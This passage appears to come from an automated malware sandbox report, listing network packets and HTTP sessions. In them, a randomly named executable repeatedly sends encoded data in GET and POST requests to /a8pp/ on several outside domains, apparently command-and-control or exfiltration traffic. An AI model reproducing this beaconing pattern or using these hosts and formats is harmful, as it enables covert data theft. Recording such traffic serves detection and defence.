                                        Jun 4, 2024 14:39:27.802886963 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:28.026855946 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.027035952 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:28.028928995 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:28.253045082 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.253918886 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.253943920 CEST804987064.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:28.254074097 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:29.533981085 CEST4987080192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:30.552287102 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:30.780896902 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:30.781107903 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:30.783164978 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:31.012324095 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:31.012339115 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:31.012680054 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:31.015290976 CEST4987180192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:31.243756056 CEST804987164.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:36.019597054 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.136941910 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.137105942 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.139025927 CEST4987280192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:39:36.256202936 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340501070 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340539932 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:39:36.340603113 CEST804987223.227.38.74192.168.11.30
                                        Jun 4, 2024 14:40:44.129301071 CEST4988380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:40:44.296221018 CEST8049883192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:41:09.014807940 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.239082098 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:09.239249945 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.241153002 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.465466022 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:09.465480089 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:09.465876102 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.468352079 CEST4988880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:09.692492008 CEST804988891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:14.482065916 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.599726915 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.599977016 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.601763010 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.719410896 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.747421980 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.747498035 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:14.747776985 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.750180960 CEST4988980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:41:14.867810011 CEST804988934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:41:19.761286974 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.070470095 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.070770025 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.072335958 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.381417990 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.382594109 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.382685900 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:20.383126974 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.385232925 CEST4989080192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:41:20.694315910 CEST8049890160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:41:25.401048899 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.627258062 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:25.627441883 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.629314899 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.855757952 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:25.855772018 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:25.856251955 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:25.858436108 CEST4989180192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:41:26.084593058 CEST804989191.195.240.19192.168.11.30
                                        Jun 4, 2024 14:41:30.868065119 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:30.998502016 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:30.998737097 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.000834942 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.131365061 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.206630945 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.206644058 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.207026958 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.207264900 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:31.207509041 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.211359024 CEST4989280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:41:31.341762066 CEST8049892172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:41:37.069681883 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.237261057 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.237709999 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.239459038 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.407226086 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.422058105 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.422127962 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:37.422591925 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.424434900 CEST4989380192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:41:37.591567039 CEST8049893162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:41:42.427877903 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.653006077 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:42.653249979 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.655119896 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.881182909 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:42.881198883 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:42.881534100 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:42.883366108 CEST4989480192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:41:43.108449936 CEST804989464.190.62.22192.168.11.30
                                        Jun 4, 2024 14:41:47.895430088 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.026066065 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.026571989 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.028067112 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.158675909 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203505993 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203603029 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203670979 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.203948975 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.204235077 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:48.204466105 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.207215071 CEST4989580192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:41:48.337804079 CEST804989523.227.38.74192.168.11.30
                                        Jun 4, 2024 14:41:53.222913027 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.433830023 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.434117079 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.435539007 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.646270037 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649365902 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649462938 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649477005 CEST8049897217.70.184.50192.168.11.30
                                        Jun 4, 2024 14:41:53.649859905 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.653150082 CEST4989780192.168.11.30217.70.184.50
                                        Jun 4, 2024 14:41:53.863826990 CEST8049897217.70.184.50192.168.11.30
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.11.30 | 49794 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:34:31.075062037 CEST | 466 | OUT | GET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.peptily.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:34:31.299433947 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.11.30 | 49795 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:34:46.646238089 CEST | 757 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHU7DKxbsU78sUgf+rBdeRSmR7bAd9IFGHhpBIazCSPBANT/EMqOw/JD/Om2eVP0+tqcgCbNazj3PLGfc545gN8+WZUwXVhix8Jz5z36fCR12CZbg7BS37rbiIA1HOgke6++gxYJZK2tJPZrCKqoVRaMOkdQR3jS9JKrYeybmIDn14ee0OUmP4Hg==
                                        Jun 4, 2024 14:34:46.790998936 CEST | 462 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:46 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge2
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.11.30 | 49796 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:34:49.297286034 CEST | 777 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHVf/K07QUsssLlf+rP9eVShZ7bBY2Iw2HmLpIZyCSKBANbfEJ3ew0JCC7m3yVP06tqZECb62yinPNO/c72ZgN8+WZUwD7hi58JCJz2f/NS12Babg7Ti33rbiuAxGbgmW6+/QxbYZFlNJJULCZ65kcddKPWg9EpxZgCcpEvYSKQHJVCfZmWkOjaqKLnXXeJxxIVDbi71a07WA=
                                        Jun 4, 2024 14:34:49.445028067 CEST | 462 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:49 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.11.30 | 49797 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:34:51.937674999 CEST | 1694 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:34:52.085994959 CEST | 462 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:52 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.11.30 | 49798 | 34.120.137.41 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:34:54.577596903 CEST | 474 | OUT | GET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:34:54.724420071 CEST | 606 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:54 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.11.30 | 49799 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:01.591856003 CEST | 760 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3QkYvstgozG6O2Xc35cGwp/TKSfK+Ed7sSUsUWxxNYwieS7Mw7agQrvqj4dWcmrwKudb36t77viw/QlFouBx2RMt1th5Joy2aJY1ECjk8b/nLtsZEc2TyoYolrF4MGlh5j2J8eRF58ih9LBb2cR8D6z7JCmC2VscsTDFG06ctxyq6HSFq8LxyNg==
                                        Jun 4, 2024 14:35:01.903924942 CEST | 381 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:01 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.11.30 | 49800 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:04.424793005 CEST | 780 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3RFovuO4o1m6N53c328G0p/fKSe+uDojsL2kUX1tNZwieGrM1j6gPrvnc4cqcmr0KufT36aP8sSw9LVFmxxx2RMt1thtvozeaIrtEQXw/TfnE78ZEY2TuoYp2rEkqGg95j358fEp+vCh7GhaXURoP+iK+Dh+DVdUrSU0cp5oviSWXbToC+JwpQojshxIZjPOLIsUz0li7eBg=
                                        Jun 4, 2024 14:35:04.737843037 CEST | 381 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:04 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.11.30 | 49801 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:07.267520905 CEST | 1697 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:07.580271006 CEST | 381 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:07 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.11.30 | 49802 | 160.124.114.188 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:10.111073017 CEST | 475 | OUT | GET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:10.422995090 CEST | 355 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:10 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Data Ascii: a3<title>-</title><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><script src="/js.js"></script>0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.11.30 | 49803 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:16.018084049 CEST | 769 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MBnbh6NgGcgpncDw+Jdb6+xyl6FZfryBSmIOPEBH+WmA8bOI2vQ1qxM+3aV01hsGgb2Su682ZM4GAS6ijceG9dufwc5cUNrWGxGyOjIBaq0dp/CXuE6H+mSihf0naWXxWLI7wWC47c0/J+8MjtvM0/7mysbzapqBfXsScywa7Oi1BaX2CXoKaPA==
                                        Jun 4, 2024 14:35:16.244477987 CEST    208    IN    HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        10    192.168.11.30    49804    91.195.240.19    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:18.773021936 CEST    789    OUT    POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MDHrh5u4GeApgZDw+cNb++x+l6H1PrhlSnqWPWUz+XmA8VuI5hw0kxMyRaUY1hsCgbyWu6N2WMoGCZailDuG9dufwc44uNq+GxWCOycUMp0cb6CXuJaH6mSiff1qPWVZWLM/wRWM4S0/LgMNusf5s06jGg4Pis7x2S7jGvzu5dCJsGWbqVqLBSIVPZPjnjtIh9DR/mGPs1Ek=
